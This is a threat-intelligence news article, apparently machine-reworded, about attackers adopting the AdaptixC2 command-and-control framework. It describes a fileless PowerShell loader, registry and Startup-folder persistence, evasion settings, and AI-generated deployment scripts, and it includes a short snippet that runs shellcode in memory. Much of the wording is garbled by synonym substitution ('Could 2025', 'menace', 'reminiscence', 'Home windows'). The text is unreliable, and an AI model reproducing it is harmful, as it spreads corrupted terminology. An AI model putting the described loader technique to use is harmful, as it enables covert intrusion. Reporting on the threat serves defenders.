In early Could 2025, safety groups started observing a sudden rise in post-exploitation exercise leveraging an open-source command-and-control framework generally known as AdaptixC2.
Initially developed to help penetration testers, this framework gives a variety of capabilities—file system manipulation, course of enumeration, and covert channel tunneling—which have now been adopted by malicious actors.
The framework’s modular design and extensibility by way of “extenders” make it notably engaging for adversaries in search of a customizable toolkit that may evade conventional defenses.
Palo Alto Networks researchers famous that AdaptixC2 remained largely beneath the radar till menace intelligence feeds started reporting infections throughout a number of sectors.
One early marketing campaign relied on social engineering through faux assist desk distant assist requests, tricking customers into executing Fast Help periods that unleashed a multi-stage PowerShell loader.
Inside minutes, adversaries achieved in-memory execution of the beacon with out dropping any information, sidestepping endpoint detection measures and establishing persistent management over the sufferer host.
As incidents proliferated, a unique cluster of intrusions emerged involving AI-generated scripts designed to deploy AdaptixC2.
Palo Alto Networks analysts recognized stylistic markers—numbered feedback and verbose output confirmations—that pointed to code produced by giant language fashions.
These scripts not solely downloaded and decrypted a Base64-encoded payload, but additionally used .NET’s GetDelegateForFunctionPointer to execute shellcode instantly in reminiscence.
By leveraging built-in Home windows APIs reminiscent of VirtualProtect and CreateProcess, attackers achieved stealthy deployment and dependable persistence.
Throughout each eventualities, the affect has been important. Compromised environments have seen lateral motion facilitated by SOCKS4/5 tunneling and port forwarding, enabling information exfiltration in small chunks to mix with regular site visitors patterns.
In a single documented case, adversaries mixed AdaptixC2 with Fog ransomware in an assault towards a monetary establishment in Asia, demonstrating the framework’s versatility and potential to amplify downstream payloads.
Organizations counting on legacy detection methods discovered themselves ill-prepared for this modular, evolving menace.
AdaptixC2 server (Supply – Palo Alto Networks)
The graphical view of linked brokers and periods, highlighting how attackers map out there targets and plan multi-stage operations.
Beacon HTTP builder UI (Supply – Palo Alto Networks)
The encrypted configuration parameters—RC4-encrypted payloads saved alongside their keys within the PE header—permitting speedy customization of communication profiles.
An infection Mechanism through Fileless PowerShell Loader
Some of the insidious parts of AdaptixC2 deployment is its fileless an infection mechanism, executed totally in reminiscence to evade disk-based defenses.
The preliminary vector typically begins with a seemingly innocuous PowerShell script, delivered by way of a social engineering electronic mail or distant assist immediate.
Upon execution, the script invokes Invoke-RestMethod to retrieve a Base64-encoded shellcode payload from a authentic cloud storage service.
Assault vector of AdaptixC2 set up on sufferer machine (Supply – Palo Alto Networks)
It then decodes this payload and calls VirtualAlloc to allocate a reminiscence area with PAGE_EXECUTE_READWRITE permissions.
Utilizing reflection and dynamic invocation, the loader constructs a delegate pointing to the shellcode entry level:-
var ptr = GetDelegateForFunctionPointer(shellcodePtr, typeof(Motion));
((Motion)ptr)();
This technique sidesteps the necessity for written executables, leaving minimal forensic artifacts. Following profitable execution, the script employs CreateShortcut within the person’s Startup folder or writes a Run key to the registry beneath a well-recognized title reminiscent of “Updater,” making certain that the beacon survives reboots.
Detection evasion is additional enhanced by configurable KillDate and WorkingTime parameters, which restrict beacon exercise to pre-defined home windows, and by customizable user-agent strings and HTTP headers.
Safety groups should due to this fact enrich telemetry with memory-based detections and network-behavior analytics to intercept these in-flight payloads earlier than they totally set up their C2 channels.
Steady monitoring for dynamic invocation APIs and anomalous PowerShell little one processes stays crucial to disrupting this contemporary, fileless an infection chain.
Increase your SOC and assist your staff defend your corporation with free top-notch menace intelligence: Request TI Lookup Premium Trial.
